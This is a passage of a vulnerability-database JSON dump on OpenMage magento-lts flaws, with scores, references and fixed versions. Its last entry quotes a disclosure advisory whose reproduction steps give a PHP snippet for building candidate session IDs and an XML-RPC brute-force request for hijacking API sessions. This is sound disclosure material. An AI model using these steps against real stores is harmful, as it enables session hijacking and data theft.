"VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.13" } ], "aliases": [ "CVE-2021-32758", "GHSA-26rr-v2j2-25fh" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jr6u-gjtr-3udv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/41381?format=api", "vulnerability_id": "VCID-kctp-3z8m-5fg2", "summary": "Improper Input Validation\nOpenMage magento-lts is an alternative to the Magento CE official releases. Due to missing sanitation in data flow in versions prior to 19.4.15 and 20.0.13, it was possible for admin users to upload arbitrary executable files to the server. OpenMage versions 19.4.15 and 20.0.13 have a patch for this Issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-32759", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0055", "scoring_system": "epss", "scoring_elements": "0.68344", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0055", "scoring_system": "epss", "scoring_elements": "0.68318", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.0055", "scoring_system": "epss", "scoring_elements": "0.6836", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0055", "scoring_system": "epss", "scoring_elements": "0.68367", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-32759" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/34709ac642d554aa1824892059186dd329db744b", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/commit/34709ac642d554aa1824892059186dd329db744b" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.15", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.15" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.13", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.13" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32759", "reference_id": "CVE-2021-32759", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32759" }, { "reference_url": "https://github.com/advisories/GHSA-xm9f-vxmx-4m58", "reference_id": "GHSA-xm9f-vxmx-4m58", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xm9f-vxmx-4m58" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-xm9f-vxmx-4m58", "reference_id": "GHSA-xm9f-vxmx-4m58", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-xm9f-vxmx-4m58" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/58829?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.13", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.13" } ], "aliases": [ "CVE-2021-32759", "GHSA-xm9f-vxmx-4m58" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kctp-3z8m-5fg2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/48322?format=api", "vulnerability_id": "VCID-mdd4-wk6v-a3cw", "summary": "OpenMage vulnerable to XSS in Admin Notifications\nOpenMage versions v20.15.0 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an admin with direct database access or the admin notification feed source to inject malicious scripts into vulnerable fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64174", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10306", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.1039", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10432", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10412", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64174" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/9d604f5489851c54a96fca31b0e13c414b0fb20a", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-06T21:19:51Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/9d604f5489851c54a96fca31b0e13c414b0fb20a" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64174", "reference_id": "CVE-2025-64174", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64174" }, { "reference_url": "https://github.com/advisories/GHSA-qv78-c8hc-438r", "reference_id": "GHSA-qv78-c8hc-438r", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qv78-c8hc-438r" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-qv78-c8hc-438r", "reference_id": "GHSA-qv78-c8hc-438r", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-06T21:19:51Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-qv78-c8hc-438r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/71318?format=api", "purl": "pkg:composer/openmage/magento-lts@20.16.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.16.0" } ], "aliases": [ "CVE-2025-64174", "GHSA-qv78-c8hc-438r" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mdd4-wk6v-a3cw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/53978?format=api", "vulnerability_id": "VCID-nv23-eun4-1fdd", "summary": "Unrestricted Upload of File with Dangerous Type\nOpenMage is a community-driven alternative to Magento CE. In OpenMage, an administrator with permission to import/export data and to edit cms pages was able to inject an executable file on the server via layout xml.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26295", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00751", "scoring_system": "epss", "scoring_elements": "0.73522", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00751", "scoring_system": "epss", "scoring_elements": "0.73559", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00751", "scoring_system": "epss", "scoring_elements": "0.73564", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00751", "scoring_system": "epss", "scoring_elements": "0.73551", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00751", "scoring_system": "epss", "scoring_elements": "0.73538", "published_at": "2026-06-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-26295" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26295", "reference_id": "CVE-2020-26295", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26295" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/79588?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9tvj-q7kh-7faz" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-b33e-r7rr-pyf7" }, { "vulnerability": "VCID-b7ua-zfks-fyg5" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-jr6u-gjtr-3udv" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.5" } ], "aliases": [ "CVE-2020-26295", "GHSA-52c6-6v3v-f3fg" ], "risk_score": null, "exploitability": "0.5", "weighted_severity": "0.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nv23-eun4-1fdd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/53747?format=api", "vulnerability_id": "VCID-pvcg-c61e-x3an", "summary": "Deserialization of Untrusted Data\nIn Magento (rubygems openmage/magento-lts package) before versions 19.4.8 and 20.0.4, an admin user can generate soap credentials that can be used to trigger RCE via PHP Object Injection through product attributes and a product. The issue is patched in versions 19.4.8 and 20.0.4.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-15244", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0087", "scoring_system": "epss", "scoring_elements": "0.75549", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.0087", "scoring_system": "epss", "scoring_elements": "0.75557", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.0087", "scoring_system": "epss", "scoring_elements": "0.7557", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0087", "scoring_system": "epss", "scoring_elements": "0.7558", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.0087", "scoring_system": "epss", "scoring_elements": "0.75577", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-15244" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/26433d15b57978fcb7701b5f99efe8332ca8630b", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/commit/26433d15b57978fcb7701b5f99efe8332ca8630b" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15244", "reference_id": "CVE-2020-15244", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15244" }, { "reference_url": "https://github.com/advisories/GHSA-jrgf-vfw2-hj26", "reference_id": "GHSA-jrgf-vfw2-hj26", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jrgf-vfw2-hj26" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-jrgf-vfw2-hj26", "reference_id": "GHSA-jrgf-vfw2-hj26", "reference_type": "", "scores": [ { "value": "8.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-jrgf-vfw2-hj26" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/79036?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-4tsg-n4v2-vyhg" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9tvj-q7kh-7faz" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-b33e-r7rr-pyf7" }, { "vulnerability": "VCID-b7ua-zfks-fyg5" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-dj3k-4q1f-xfbh" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-g75g-ab3s-y7db" }, { "vulnerability": "VCID-gewj-4tzh-k3e5" }, { "vulnerability": "VCID-gn12-464m-fkcu" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-jr6u-gjtr-3udv" }, { "vulnerability": "VCID-kctp-3z8m-5fg2" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-nv23-eun4-1fdd" }, { "vulnerability": "VCID-tqce-uume-myc2" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" }, { "vulnerability": "VCID-zwm8-96yp-nben" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.4" } ], "aliases": [ "CVE-2020-15244", "GHSA-jrgf-vfw2-hj26" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pvcg-c61e-x3an" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44327?format=api", "vulnerability_id": "VCID-tqce-uume-myc2", "summary": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in openmage/magento-lts.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41231", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00992", "scoring_system": "epss", "scoring_elements": "0.77275", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00992", "scoring_system": "epss", "scoring_elements": "0.77286", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00992", "scoring_system": "epss", "scoring_elements": "0.77276", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00992", "scoring_system": "epss", "scoring_elements": "0.77266", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00992", "scoring_system": "epss", "scoring_elements": "0.77245", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-41231" }, { "reference_url": "https://github.com/OpenMage/magento-lts", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/OpenMage/magento-lts" }, { "reference_url": "https://github.com/OpenMage/magento-lts/commit/d16fc6c5a1e66c6f0d9f82020f11702a7ddd78e4", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:15Z/" } ], "url": "https://github.com/OpenMage/magento-lts/commit/d16fc6c5a1e66c6f0d9f82020f11702a7ddd78e4" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:15Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v19.4.22" }, { "reference_url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:15Z/" } ], "url": "https://github.com/OpenMage/magento-lts/releases/tag/v20.0.19" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41231", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41231" }, { "reference_url": "https://github.com/advisories/GHSA-h632-p764-pjqm", "reference_id": "GHSA-h632-p764-pjqm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h632-p764-pjqm" }, { "reference_url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-h632-p764-pjqm", "reference_id": "GHSA-h632-p764-pjqm", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-03-10T20:58:15Z/" } ], "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-h632-p764-pjqm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/63720?format=api", "purl": "pkg:composer/openmage/magento-lts@20.0.19", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-19kk-2s77-nuaa" }, { "vulnerability": "VCID-66qk-mhwg-tqcz" }, { "vulnerability": "VCID-7srh-wcuk-ryhg" }, { "vulnerability": "VCID-9axm-6vqd-tkag" }, { "vulnerability": "VCID-9ztp-ffqs-4yh4" }, { "vulnerability": "VCID-cbms-5g8f-wyg6" }, { "vulnerability": "VCID-dg5g-wnuf-ryad" }, { "vulnerability": "VCID-fken-twwj-gkaq" }, { "vulnerability": "VCID-h9n9-9mxj-zqd6" }, { "vulnerability": "VCID-jfan-uqf5-3qhd" }, { "vulnerability": "VCID-mdd4-wk6v-a3cw" }, { "vulnerability": "VCID-upex-64ca-uqbf" }, { "vulnerability": "VCID-xazc-hmj9-guas" }, { "vulnerability": "VCID-xhm4-u8ax-wuew" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/openmage/magento-lts@20.0.19" } ], "aliases": [ "CVE-2021-41231", "GHSA-h632-p764-pjqm", "GMS-2023-157" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tqce-uume-myc2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92784?format=api", "vulnerability_id": "VCID-upex-64ca-uqbf", "summary": "Magento LTS has Weak API Session ID — Predictable MD5 of Time-Derived Inputs\nAffected Version: OpenMage LTS ≤ 20.16.0 (confirmed on `20.16.0`)\n\nAffected File: `https://github.com/OpenMage/magento-lts/blob/main/app/code/core/Mage/Api/Model/Session.php` – `start()` method\n\n\n## Summary\n\nThe XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):\n\n```php\nThe XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):\n```\nAll inputs to the MD5 hash are time-derived and non-secure:\n\n| Input | Value | Predictability |\n|----------------------------|---------------------------------------------------|----------------------------------------|\n| `time()` | Unix timestamp (seconds) | Fully predictable |\n| `uniqid('', true) prefix` | `sprintf('%08x%05x', $sec, $usec/10)` | Highly predictable via network timing |\n| `uniqid('', true) suffix` | `php_combined_lcg()` decimal float | Process-state dependent (`getpid() ^ time()`) |\n| `$sessionName` | `null` (empty) — called without arg | Constant |\n\nBecause the resulting digest relies entirely on the timestamp and the PHP internal LCG state, the effective entropy is severely constrained. This violates the OWASP ASVS v4 requirement of ≥ 64 bits of entropy (V3.2.2) and NIST SP 800-63B standards. By narrowing the LCG window (via server state leaks or general predictability) and leveraging the lack of API rate-limiting, an attacker can generate a localized pool of candidate MD5 hashes and execute a high-speed online brute-force attack to hijack active API sessions.\n\n\n\n## Technical Analysis\n\n### Code Path\n\n```\nPOST /api/xmlrpc/ → login(username, apiKey)\n → Mage_Api_Model_Session::login()\n → $session->init('api', 'api')\n → Mage_Api_Model_Session::init($namespace='api', $sessionName='api')\n # $sessionName is NOT forwarded to start()\n → Mage_Api_Model_Session::start() ← NO $sessionName argument\n # $sessionName = null inside start()\n $this->_currentSessId = md5(time() . uniqid('', true) . null)\n\n```\n\nNote: `init()` receives `$sessionName='api'` but invokes `$this->start()` without forwarding it, meaning the effective construction is strictly `md5(time() . uniqid('', true))`.\n\n## Live Evidence\nFive consecutive XML-RPC login tokens were collected from a live OpenMage 20.16.0 container, all generated within a single Unix second (`unix_sec= 1775817593`):\n```\nSample 1: 6a302397f17e48845d0f9aba377f3dc3 (usec ≈ 464631)\nSample 2: 39b4ec42bd3c389312e500690daeb349 (usec ≈ 497215)\nSample 3: 527662d79f7fb499597a82d80d170a88 (usec ≈ 535175)\nSample 4: e5d6f7a8906a03ea7af99d92be11b5b2 (usec ≈ 568838)\nSample 5: 5bdf27e5cb877c77b8965b008548edfa (usec ≈ 600118)\n```\nThe µsecond portion is directly observable by measuring request-to-response latency. The only variance preventing immediate prediction is the LCG float component, which is seeded deterministically.\n\n<img width=\"772\" height=\"506\" alt=\"image\" src=\"https://github.com/user-attachments/assets/53ced1fd-deb4-4dc4-81ec-864e3a2811de\" />\n\n## Steps to Reproduce (Online Brute-Force Scenario)\nBecause validation requires live HTTP requests, this exploit relies on narrowing the entropy window and abusing the lack of API rate limits.\n### Step 1 – Record Login Timestamp\nAn attacker observes the precise moment a victim authenticates to `/api/xmlrpc/` (e.g., via network timing, exposed logs, or side-channel signals), capturing the exact Unix second.\n### Step 2 – Generate Candidate Pool\nThe attacker reconstructs the MD5 format using the known timestamp, the estimated microsecond window, and bounds the LCG float based on known server PID ranges (or via a `/server-status` leak).\n```\n$t = $observed_sec;\n$usec_estimate = 500000; // Derived from latency\n$uid = sprintf('%08x%05x', $t, intval($usec_estimate / 10));\n$candidate = md5($t . $uid); // + LCG variants\n```\n### Step 3 – API Brute-Force (Session Hijack)\nBecause the `/api/xmlrpc/` endpoint does not enforce rate limiting on authenticated calls, the attacker blasts the candidate MD5 hashes against a privileged endpoint (e.g., magento.info) using a highly concurrent HTTP runner.\n\n```\nPOST /api/xmlrpc/\n<?xml version=\"1.0\"?>\n<methodCall>\n <methodName>[magento.info](http://magento.info/)</methodName>\n <params>\n <param><value><string>CANDIDATE_SESSION_ID</string></value></param>\n </params>\n</methodCall>\n```\n\nA non-fault response (HTTP 200 containing data) confirms the session is successfully hijacked.\n\n<img width=\"1039\" height=\"374\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ac9338e9-e3fe-44fe-9337-cb6edf6ab849\" />\n\n## Impact\n### Technical Impact\nSuccessful session prediction grants the attacker all capabilities of the authenticated API user. The XML-RPC API exposes endpoints for:\n- Full product catalog 